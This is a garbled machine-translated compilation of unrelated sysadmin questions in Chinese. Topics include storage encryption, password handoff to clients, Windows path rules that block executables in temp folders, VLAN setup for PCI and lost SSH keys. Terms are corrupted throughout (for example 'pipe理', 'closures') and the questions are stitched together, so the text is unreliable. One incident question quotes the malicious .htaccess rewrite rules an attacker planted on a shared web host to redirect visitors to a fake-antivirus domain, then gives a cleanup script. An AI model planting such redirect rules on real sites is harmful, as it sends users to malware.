我想确保静态encryption在一个地方和正确的地方完成。 如果共享存储,这似乎是正确的地方,而不是DAS。 主要我想介绍一下无钥匙恢复硬盘的情况,SAN启动时需要密钥(应该是一件非常罕见的事情,不是一个痛苦,但也包括盗窃整个工具包和存储区的人的情况)。 要连接到SAN,您需要iSCSI(凭据)或位于FC交换机上。 这似乎将涵盖数据库和NAS案例。 这是对还是错?
通常,我最终为客户端做服务器pipe理,作为开发Web应用程序的一部分,我总是使用SSH密钥对为自己设置访问权限。 我通常最终会为root帐户select一个随机密码并通过电子邮件发送给我的客户。 客户有时甚至不需要访问,我只是想确保而不是唯一一个持有密钥,以防万一我无法使用,或者他们切换到另一个开发人员。 对于非技术型客户, pipe理,存储和交stream重要密码和凭证的最佳方式是什么 ? 就个人而言,我使用Lastpass ,但要求客户注册共享一个不能通过浏览器使用的密码似乎有点closures。
我有一个用户以外的pipe理员组。 如何授予该(特定)用户的服务控制pipe理员访问权限? 就像下面链接的SC_MANAGER_ALL_ACCESS一样: http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981%28v=vs.85%29.aspx
我试图通过限制* .exe在less数几个位置的执行,特别是各种压缩工具解压到的临时文件夹,当用户可能select打开可执行文件直接从一个Zip文件。 从TechNet文章http://technet.microsoft.com/nl-nl/library/cc786941%28v=ws.10%29.aspx : 您可以在path规则中使用环境variables。 由于path规则是在客户端环境中进行评估的,因此使用环境variables(例如%Windir%)的function允许规则适应特定用户的环境。 … path规则可以包含? 和*通配符,允许诸如“* .vbs”的规则匹配所有的Visual Basic脚本文件。 以下示例说明了通配符的使用: “\ DC – ?? \ login $”匹配\ DC-01 \ login $,\ DC-02 \ login $ “* \ Windows”匹配C:\ Windows,D:\ Windows,E:\ Windows “c:\ win *”匹配c:\ winnt,c:\ windows,c:\ windir 我有这些path规则(我已经应用了单一和各种组合): %APPDATA%\*.exe %APPDATA%\*\*.exe %LOCALAPPDATA%\*.exe %LOCALAPPDATA%\*\*.exe %TEMP%\*.exe %TEMP%\7z*\*.exe %TEMP%\wz*\*.exe %TEMP%\Rar*\*.exe …理论上应该代表用户临时文件夹下的可执行文件,以及以Winzip,WinRAR和7-zip命名临时文件夹(例如%TEMP%\7zSF20.tmp\the_file.exe的方式命名的临时文件夹中的可执行文件)。 %APPDATA%和%LOCALAPPDATA%工作; %TEMP%的人没有。 可执行文件似乎在%TEMP%下被阻止,但这只是因为在默认设置下,它们也与%LOCALAPPDATA%\*\*.exe规则相匹配(默认情况下Temp为AppData \ Local)。 我原本以为这是在部分文件夹名称通配符的问题,但它显示这是特定于使用%TEMP%variables(因此重写)。 […]
我看了官方网站的文档,find起点有点难。 有没有一个免费的综合指南,很容易理解的人从来没有处理mod_security?
我不是networkingpipe理员,但是我的networkingpipe理员也遇到了麻烦。 我的问题正如标题所说… Windows安全(在Windows 7)不断要求我的凭据,并不会“记住我的凭据” 即使我勾选标有“记住我的凭证”的框,我最终会被提示再次input我的凭证。 我是这台电脑的pipe理员。 请让我知道,如果有任何其他细节,我可以提供!
我们有一个小型的商务办公室,但由于PCI合规性,我们需要把这个分成两个互联网(一个“兼容”,一个用于其他设备)。 我们目前有一个Draytek调制解调器/湾负载平衡器也具有防火墙,但这是非常基本的,不支持每个VLAN的单独的安全策略。 因此,我刚刚购买了一台ASA 5505,想要设置一些指标: 虚拟局域网: 外面(draytek) InsidePci(我们的安全区域,包含一个Windows域控制器/ dhcp / etc) 里面(只是一个普通的networking,只有互联网接入,没有连接到VLAN 我的问题: 目前一切都在一个子网192.168.2.x. draytek有一个静态的IP,其他的都是从我们的Windows DHCP服务器分配一个IP。 由于这个windows服务器将在'insidepci'networking内,我打算让这个vlan继续使用它,并且使用来自ASA的DHCP的常规“内部”networking。 那可能吗? 我是否需要将draytek放在它自己的子网上(因此只需要draytek就是192.168.3.x),因为看起来我不能在相同的范围内将IP分配给两个不同的VLAN。 从看在线指南之一,似乎我需要一个内部路由器? 我没有意识到这一点,我希望我可以只分配一个开关到'内部'VLAN和一个单独的开关到'insidepci'的VLAN? 这些VLAN之间不需要通信,但都需要能够访问“外部”(draytek网关)
我们运营一个托pipe大约300个网站的网站服务器。 昨天早上,一个脚本在大多数(但不是全部)站点的document_root下的每个目录中都放置了.htaccess文件,这些文件由www-data(apache用户)拥有。 .htaccess文件的内容是这样的: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} 谷歌search该url(这是“杀毒软件”的md5哈希),我发现这一切都发生在互联网上,并正在寻找已经处理这个问题的人,并确定漏洞是在哪里 。 我搜查了大部分日志,但还没有发现任何结论。 有没有其他人经历过比我更深入的洞察? 到目前为止我们已经确定: 所做的更改是作为万维网数据,所以Apache或它的插件可能是罪魁祸首 所有的改变都是在15分钟内完成的,所以可能是自动的 由于我们的网站域名广泛不同,我认为一个网站上的单个漏洞是负责任的(而不是每个网站上的常见漏洞) 如果一个.htaccess文件已经存在,并且可以通过www-data写入,那么脚本就很实用,并且简单地将上面的代码行附加到文件的末尾(使其易于反转) 任何更多的提示将不胜感激。 == ==编辑 对于那些需要它的人,这里是我用来清理.htaccess文件的脚本: #!/bin/bash PATT=84f6a4eef61784b33e4acbd32c8fdd72.com DIR=/mnt TMP=/tmp/`mktemp "XXXXXX"` find $DIR -name .htaccess|while read FILE; do if ( grep $PATT "$FILE" > /dev/null); then if [ `cat "$FILE"|wc -l` -eq 4 ]; […]
用户A有两个SSH私钥,随着时间的推移,他在一些服务器上使用了这个公钥,他丢失了一个私钥,创build了一个新的私钥对。 用户A如何告诉我(系统pipe理员),他丢失了密钥,以及如何pipe理他所访问的所有服务器(我没有用户A有权访问的所有服务器的列表)。 换句话说,我该如何回忆与这个私钥相关的公钥。 在基于LDAP的身份validation中,所有服务器都将与单个服务器存储库进行通信以进行身份validation,如果我删除了访问或修改了服务器上的密码,则当用户A丢失其密码时,所有使用此LDAP进行身份validation的系统都将受到保护。
有没有办法强制我的戴尔BMC和iDrac卡只使用lanplus接口,而不是使用不安全的“LAN”接口。 我知道IPMI规范中有一些“防火墙”function。 限制机箱之间的某些function,但是我不知道是否可以这样使用。 更新:我的箱子都在交换环境中。 我的服务器或工作桌面之间没有NAT。 我正在使用ipmitool -I lanplus -H myhost -u root -p密码-K sol activate“通过IPMI与串行控制台交谈。 update2:当我在交换环境中时,我无法控制交换机。 如果我不能在主持人或idrac本身做,那么这是一个非起动器。